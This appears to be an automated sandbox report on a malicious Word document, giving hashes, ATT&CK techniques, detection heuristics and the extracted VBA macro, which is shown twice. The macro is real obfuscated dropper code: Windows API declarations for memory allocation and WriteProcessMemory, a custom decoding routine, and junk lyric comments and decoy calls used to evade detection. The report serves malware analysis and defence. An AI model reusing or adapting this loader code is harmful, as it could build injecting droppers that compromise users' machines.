Office (OLE) malware analysis — malicious · dfc1b17c6d5465e9

MALICIOUS

Office (OLE)

229.0 KB Created: 2017-06-01 11:44:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: 7e58847b2976bbfe4ad18766cdf79f3c SHA-1: e58fe871b11d0b8fec212678ebb2d4797079ca86 SHA-256: dfc1b17c6d5465e9409b0e007f2a328eb37c6ed4d94c8b5db9e014398327d99a

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The macro uses API calls such as WriteProcessMemory, indicating it's designed to inject code or download and execute a second-stage payload. The presence of `Shell` execution in the `Document_Open` event further supports this. The ClamAV detection name 'Doc.Dropper.Agent' also suggests a dropper functionality.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6850893-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6850893-0
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY

Reference to WriteProcessMemory API
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.iec.ch In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9134 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9134 bytes
SHA-256: `30d2115e76f12050e489f0b6e682c4574bd467a1c93d2ea287d9aed758009770`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "cerulescent" ' ' I feel the end is closing in #If (4 + 3) > 4 / 2 And Win64 > (6 - 6) / 1 Then ' That vanish into the black sun ' That vanish into the black sun Public Declare PtrSafe Function owing Lib "ntdll.dll " Alias "NtAllocateVirtualMemory" (martian As LongPtr, pomfret As LongPtr, ByVal ceratozamia As LongPtr,expressionismByVal As LongPtr, micrometeorite As LongPtr, ByVal emptying As LongPtr) As LongPtr ' That vanish into the black sun ' That vanish into the black sun Public Declare PtrSafe Function streptomycin Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (albata As LongPtr, hiss As Any,legumin As LongPtr, purblind As Any) As Boolean ' Visions of happiness are burning ' Of sorrow slowly killing me Public Declare PtrSafe Function shikar Lib "Kernel32" Alias "CreateTimerQueueTimer" (scented As Any, ByVal philanthropist As Any, ByVal roentgenogram As Any, ByVal halve As Any, ByVal admonitory As Any, ByVal soidisant As Any, ByVal matchless As Any) As Long ' I must fight this feeling ' Taste the last drops of life Public Declare PtrSafe Function chintz Lib "ntdll.dll" Alias "NtDeleteAtom" (replevy As LongPtr) ' I feel the end is closing in ' My heart is bleeding why am I here Public Declare PtrSafe Function southey Lib "Shlwapi.dll" Alias "CreateFileWrapW" (gabonese As LongPtr) As LongPtr ' Dreams that turn into madness ' That vanish into the black sun Public Declare PtrSafe Function chronograph Lib "Kernel32.dll" Alias "CreateEventW" (ByVal botanic As LongPtr,misunderstood As LongPtr,adorably As LongPtr,aeternum As LongPtr,obvious As LongPtr) As Long ' I can feel my soul leaving me ' I feel the end is closing in Public Declare PtrSafe Function colorable Lib "Kernel32.dll " Alias "WriteProcessMemory" (ByVal piscatorial As Any, ByVal barrier As Any, ByVal altogeher As Any, ByVal irishman As Any, ByVal hear As Any) As LongPtr ' I can feel my soul leaving me ' I feel the end is closing in Public Declare PtrSafe Function christening Lib "ntdll.dll" Alias "NtCreateEventPair" (celeriac As LongPtr,ammoniacal As LongPtr,misrepresented As LongPtr) As LongPtr ' ' Life doesn't work out as planned ' That vanish into the black sun ' That vanish into the black sun #Else ' I can feel my soul leaving me ' I can feel my soul leaving me Public Declare Function owing Lib "Ntdll.dll " Alias "NtAllocateVirtualMemory" (announced As Long, agglutinative As Long, ByVal discontinue As Long, fourthlyByVal As Long, motherofpearl As Long, ByVal shahaptian As Long) As Long ' I feel the end is closing in ' My heart is bleeding why am I here Public Declare Function shikar Lib "Kernel32" Alias "CreateTimerQueueTimer" (bolographic As Any, ByVal punctuation As Any, ByVal mortise As Any, ByVal mateless As Any, ByVal poecilogale As Any, ByVal heady As Any, ByVal countywide As Any) As Long ' Try to breathe but there's no air ' Trying to breathe but there's no air Public Declare Function currente Lib "Kernel32.dll" Alias "CreateEventW" (ByVal ambidexterity As Long, plectranthus As Long, rending As Long, nonsmoker As Long, slantwise As Long) As Long ' I must fight this feeling ' Visions of happiness are burning Public Declare Function succeeding Lib "ntdll.dll" Alias "NtDeleteAtom" (nis As Long) ' Taste the last drops of life ' Life doesn't work out as planned Public Declare Function fatuis Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (bursiform As Long, rovescio As Any, damnosa As Long, skeletal As Any) As Boolean ' To dwell in nothing and forever disappear ' Life doesn't work out as planned Public Declare Function adiaphanous Lib "ntdll.dll" Alias "NtCreateEventPair" (enharmonic As Long, aerated As Long, bombina As Long) As Long ' Visions of happiness are burning ' Taste the last drops of life Public Declare Function colorable Lib "Kernel32.dll " Alias "WriteProcessMemory" (ByVal palatable As Any, ByVal unaccountably As Any, ByVal incarnation As Any, ByVal actinomycetal As Any, ByVal tegucigalpa As Any) As Long ' ' Trying to breathe but there's no air Public Declare Function disclosure Lib "Shlwapi.dll" Alias "CreateFileWrapW" (brachinus As Long) As Long ' My heart is bleeding why am I here ' My heart is bleeding why am I here ' I feel the end is closing in ' Taste the last drops of life #End If ' My heart is bleeding why am I here ' I feel the end is closing in Function headstock(woodsy) headstock = AscW(woodsy) End Function Sub Array1() Dim aiData(10) As Integer Dim i As Integer For i = LBound(aiData) To UBound(aiData) aiData(i) = i Next i Debug.Print "Lower Bound = " & LBound(aiData) Debug.Print "Upper Bound = " & UBound(aiData) Debug.Print "Num Elements = " & WorksheetFunction.Count(aiData) Debug.Print "Sum Elements = " & WorksheetFunction.Sum(aiData) End Sub Function buttock(democritus) As String Dim bibliophile As String Dim grammarian As Long Dim qualified As Long Dim moistened As Long Dim accra As Integer Dim postmistress As Long chine = Fix(344) Dim indene As Long naiadales = armillariella \ 64 Dim parnassia As Long Dim memoriam() As Byte Dim eyelotion(63) As Long naiadales = armillariella / 235 Dim noncomprehensively As Integer Dim innoxious(6962) As Byte Dim cleanable(63) As Long Dim acrobatic(63) As Long Dim cross As Variant poisonous = 63 analyze = 4096 sprite = 52 - 126 + 65610 welllaid = 262144 belt = 163 - 24 + 257909 burn = 5 + 4027 ashtray = 105 + 16514967 Dim quietism As String periphrastic = 94 - 28 - 2 Dim hydrographer As Byte scrofulous = 16711680 notomys = 72 + 65208 Dim chieftain As Long artist = 256 richness = 255 Dim appropriable As String allhallowmas = 0 instant = 5827 Dim audio() As Byte Dim commissure As Long Dim founded As Integer audio = VBA.StrConv(democritus, 128) Dim boundshave As Byte cruciferous = 95 blissfully = 20997 grindery = 365472 VBA.Financial.Pmt _ 0, cruciferous, 28795, 41017, 4 bury = 5827 blathering = vbKeyShift - 12 For simoon = 0 To bury If simoon Mod 2 = 0 Then audio(simoon) = audio(simoon) - blathering Else audio(simoon) = audio(simoon) - (blathering - 1) End If Next simoon athena = 113 eel = 18459 coatdress = 389307 VBA.Financial.Pmt _ 0, athena, 5650, 40852, 5 accra = 0 constituted = 6 - 88 + 82 consuetudinis = 42 - 72 + 73 jaculate = retaliating For parnassia = 0 To 63 cleanable(parnassia) = grovel(parnassia, periphrastic, 66) acrobatic(parnassia) = grovel(parnassia, analyze, 66) eyelotion(parnassia) = grovel(parnassia, welllaid, 66) Next parnassia argive = 26 raftsman = 30238 ayudante = 141870 VBA.Financial.Pmt _ 0, argive, 7440, 44270, 5 memoriam = audio perceptibly = 4 potvaliant = 114 angularness = 33068 tutelage = 496668 VBA.Financial.Pmt _ 0, potvaliant, 38361, 19669, 7 clinocephaly = 3 thrilled = "countercharm" armillariella = maneuverer / 160 ripening = clinocephaly + 1 corduroy = 11 - 9 For postmistress = 0 To bury something = memoriam(postmistress) bookmaker = memoriam(postmistress + 2) grammarian = eyelotion(jaculate(something)) _ + acrobatic(jaculate(memoriam(postmistress + 1))) + cleanable(jaculate(bookmaker)) + jaculate(memoriam(postmistress + clinocephaly)) parnassia = grovel(grammarian, scrofulous, 58) innoxious(indene) = grovel(parnassia, sprite, 48) parnassia = grovel(grammarian, notomys, 58) innoxious(indene + 1) = grovel(parnassia, artist, 48) innoxious(indene + corduroy) = grovel(grammarian, richness, 58) indene = indene + corduroy + 1 postmistress = postmistress + 3 Next buttock = innoxious End Function Function grovel(outgrowth, observing, prestige) Select Case prestige Case 48 + 2 - 2 grovel = outgrowth \ observing Case 58 + 2 - 2 grovel = outgrowth And observing Case 66 + 2 - 2 grovel = outgrowth * observing End Select End Function Function retaliating() Dim lack(255) As Byte dormouse = 79 - 44 + 30 Do lack(dormouse) = dormouse - 65 dormouse = dormouse + 1 Loop While dormouse <= 90 + 1 dormouse = 48 Do lack(dormouse) = dormouse + 4 dormouse = dormouse + 1 Loop While dormouse <= 50 + 8 dormouse = 97 Do lack(dormouse) = dormouse - 71 dormouse = dormouse + 1 Loop While dormouse <= 120 + 3 lack(47) = 63 dormouse = 43 lack(dormouse) = 60 + 2 retaliating = lack End Function Attribute VB_Name = "offered" Attribute VB_Base = "0{8F65F422-3E58-4FC6-A956-508B4876140B}{D9D6EE1F-4C45-4659-9A6F-BAA54BF614FA}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: 30d2115e76f12050e489f0b6e682c4574bd467a1c93d2ea287d9aed758009770

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "cerulescent"
'
'  I feel the end is closing in
#If (4 + 3) > 4 / 2 And Win64 > (6 - 6) / 1 Then
'  That vanish into the black sun
'  That vanish into the black sun
Public Declare PtrSafe Function owing Lib "ntdll.dll  " Alias "NtAllocateVirtualMemory" (martian As LongPtr, pomfret As LongPtr, ByVal ceratozamia As LongPtr,expressionismByVal As LongPtr, micrometeorite As LongPtr, ByVal emptying As LongPtr) As LongPtr
'  That vanish into the black sun
'  That vanish into the black sun
Public Declare PtrSafe Function streptomycin Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (albata As LongPtr, hiss As Any,legumin As LongPtr, purblind As Any) As Boolean
'  Visions of happiness are burning
'  Of sorrow slowly killing me
Public  Declare PtrSafe Function shikar Lib "Kernel32" Alias "CreateTimerQueueTimer" (scented As Any, ByVal philanthropist As Any, ByVal roentgenogram As Any, ByVal halve As Any, ByVal admonitory As Any, ByVal soidisant As Any, ByVal matchless As Any) As Long
'  I must fight this feeling
'  Taste the last drops of life
Public Declare PtrSafe Function chintz Lib "ntdll.dll" Alias "NtDeleteAtom" (replevy As LongPtr)
'  I feel the end is closing in
'  My heart is bleeding why am I here
Public Declare PtrSafe Function southey Lib "Shlwapi.dll" Alias "CreateFileWrapW" (gabonese As LongPtr) As LongPtr
'  Dreams that turn into madness
'  That vanish into the black sun
Public Declare PtrSafe Function chronograph Lib "Kernel32.dll" Alias "CreateEventW" (ByVal botanic As LongPtr,misunderstood As LongPtr,adorably As LongPtr,aeternum As LongPtr,obvious As LongPtr) As Long
'  I can feel my soul leaving me
'  I feel the end is closing in
Public Declare PtrSafe Function colorable Lib "Kernel32.dll  " Alias "WriteProcessMemory" (ByVal piscatorial As Any, ByVal barrier As Any, ByVal altogeher As Any, ByVal irishman As Any, ByVal hear As Any) As LongPtr
'  I can feel my soul leaving me
'  I feel the end is closing in
Public Declare PtrSafe Function christening Lib "ntdll.dll" Alias "NtCreateEventPair" (celeriac As LongPtr,ammoniacal As LongPtr,misrepresented As LongPtr) As LongPtr
'
'  Life doesn't work out as planned

'  That vanish into the black sun
'  That vanish into the black sun
#Else
'  I can feel my soul leaving me
'  I can feel my soul leaving me
Public Declare Function owing Lib "Ntdll.dll " Alias "NtAllocateVirtualMemory" (announced As Long, agglutinative As Long, ByVal discontinue As Long, fourthlyByVal As Long, motherofpearl As Long, ByVal shahaptian As Long) As Long
'  I feel the end is closing in
'  My heart is bleeding why am I here
Public Declare Function shikar Lib "Kernel32" Alias "CreateTimerQueueTimer" (bolographic As Any, ByVal punctuation As Any, ByVal mortise As Any, ByVal mateless As Any, ByVal poecilogale As Any, ByVal heady As Any, ByVal countywide As Any) As Long
'  Try to breathe but there's no air
'  Trying to breathe but there's no air
Public Declare Function currente Lib "Kernel32.dll" Alias "CreateEventW" (ByVal ambidexterity As Long, plectranthus As Long, rending As Long, nonsmoker As Long, slantwise As Long) As Long
'  I must fight this feeling
'  Visions of happiness are burning
Public Declare Function succeeding Lib "ntdll.dll" Alias "NtDeleteAtom" (nis As Long)
'  Taste the last drops of life
'  Life doesn't work out as planned
Public Declare Function fatuis Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (bursiform As Long, rovescio As Any, damnosa As Long, skeletal As Any) As Boolean
'  To dwell in nothing and forever disappear
'  Life doesn't work out as planned
Public Declare Function adiaphanous Lib "ntdll.dll" Alias "NtCreateEventPair" (enharmonic As Long, aerated As Long, bombina As Long) As Long
'  Visions of happiness are burning
'  Taste the last drops of life
Public Declare Function colorable Lib "Kernel32.dll  " Alias "WriteProcessMemory" (ByVal palatable As Any, ByVal unaccountably As Any, ByVal incarnation As Any, ByVal actinomycetal As Any, ByVal tegucigalpa As Any) As Long
'
'  Trying to breathe but there's no air
Public Declare Function disclosure Lib "Shlwapi.dll" Alias "CreateFileWrapW" (brachinus As Long) As Long
'  My heart is bleeding why am I here
'  My heart is bleeding why am I here

'  I feel the end is closing in
'  Taste the last drops of life
#End If
'  My heart is bleeding why am I here
'  I feel the end is closing in
Function headstock(woodsy)
headstock = AscW(woodsy)
End Function
     Sub Array1()
         Dim aiData(10) As Integer
         Dim i As Integer
         For i = LBound(aiData) To UBound(aiData)
             aiData(i) = i
         Next i
         Debug.Print "Lower Bound = " & LBound(aiData)
         Debug.Print "Upper Bound = " & UBound(aiData)
         Debug.Print "Num Elements = " & WorksheetFunction.Count(aiData)
         Debug.Print "Sum Elements = " & WorksheetFunction.Sum(aiData)
     End Sub

Function buttock(democritus) As String
Dim bibliophile As String
Dim grammarian As Long
Dim qualified As Long

Dim moistened As Long

Dim accra As Integer
Dim postmistress As Long
chine = Fix(344)

Dim indene As Long
naiadales = armillariella \ 64

Dim parnassia As Long
Dim memoriam() As Byte
Dim eyelotion(63) As Long
naiadales = armillariella / 235

Dim noncomprehensively As Integer

Dim innoxious(6962) As Byte
Dim cleanable(63) As Long
Dim acrobatic(63) As Long
Dim cross As Variant

poisonous = 63
analyze = 4096
sprite = 52 - 126 + 65610
welllaid = 262144
belt = 163 - 24 + 257909
burn = 5 + 4027
ashtray = 105 + 16514967
Dim quietism As String

periphrastic = 94 - 28 - 2
Dim hydrographer As Byte

scrofulous = 16711680
notomys = 72 + 65208
Dim chieftain As Long

artist = 256
richness = 255
Dim appropriable As String
allhallowmas = 0
instant = 5827
Dim audio() As Byte
Dim commissure As Long
Dim founded As Integer
audio = VBA.StrConv(democritus, 128)
Dim boundshave As Byte
cruciferous = 95
blissfully = 20997
grindery = 365472
 VBA.Financial.Pmt _
 0, cruciferous, 28795, 41017, 4

bury = 5827
blathering = vbKeyShift - 12
For simoon = 0 To bury
If simoon Mod 2 = 0 Then
audio(simoon) = audio(simoon) - blathering
Else
audio(simoon) = audio(simoon) - (blathering - 1)
End If
Next simoon
athena = 113
eel = 18459
coatdress = 389307
 VBA.Financial.Pmt _
 0, athena, 5650, 40852, 5

accra = 0
constituted = 6 - 88 + 82
consuetudinis = 42 - 72 + 73
jaculate = retaliating
For parnassia = 0 To 63
cleanable(parnassia) = grovel(parnassia, periphrastic, 66)
acrobatic(parnassia) = grovel(parnassia, analyze, 66)
eyelotion(parnassia) = grovel(parnassia, welllaid, 66)
Next parnassia
argive = 26
raftsman = 30238
ayudante = 141870
 VBA.Financial.Pmt _
 0, argive, 7440, 44270, 5

memoriam = audio
perceptibly = 4
potvaliant = 114
angularness = 33068
tutelage = 496668
 VBA.Financial.Pmt _
 0, potvaliant, 38361, 19669, 7

clinocephaly = 3
thrilled = "countercharm"

armillariella = maneuverer / 160

ripening = clinocephaly + 1
corduroy = 11 - 9
For postmistress = 0 To bury
something = memoriam(postmistress)
bookmaker = memoriam(postmistress + 2)
grammarian = eyelotion(jaculate(something)) _
 + acrobatic(jaculate(memoriam(postmistress + 1))) + cleanable(jaculate(bookmaker)) + jaculate(memoriam(postmistress + clinocephaly))
parnassia = grovel(grammarian, scrofulous, 58)
innoxious(indene) = grovel(parnassia, sprite, 48)
parnassia = grovel(grammarian, notomys, 58)
innoxious(indene + 1) = grovel(parnassia, artist, 48)
innoxious(indene + corduroy) = grovel(grammarian, richness, 58)
indene = indene + corduroy + 1
postmistress = postmistress + 3
Next
buttock = innoxious
End Function

Function grovel(outgrowth, observing, prestige)
Select Case prestige
Case 48 + 2 - 2
grovel = outgrowth \ observing
Case 58 + 2 - 2
grovel = outgrowth And observing
Case 66 + 2 - 2
grovel = outgrowth * observing
End Select
End Function

Function retaliating()
Dim lack(255) As Byte
dormouse = 79 - 44 + 30
Do
lack(dormouse) = dormouse - 65
dormouse = dormouse + 1
Loop While dormouse <= 90 + 1
dormouse = 48
Do
lack(dormouse) = dormouse + 4
dormouse = dormouse + 1
Loop While dormouse <= 50 + 8
dormouse = 97
Do
lack(dormouse) = dormouse - 71
dormouse = dormouse + 1
Loop While dormouse <= 120 + 3
lack(47) = 63
dormouse = 43
lack(dormouse) = 60 + 2
retaliating = lack
End Function


Attribute VB_Name = "offered"
Attribute VB_Base = "0{8F65F422-3E58-4FC6-A956-508B4876140B}{D9D6EE1F-4C45-4659-9A6F-BAA54BF614FA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.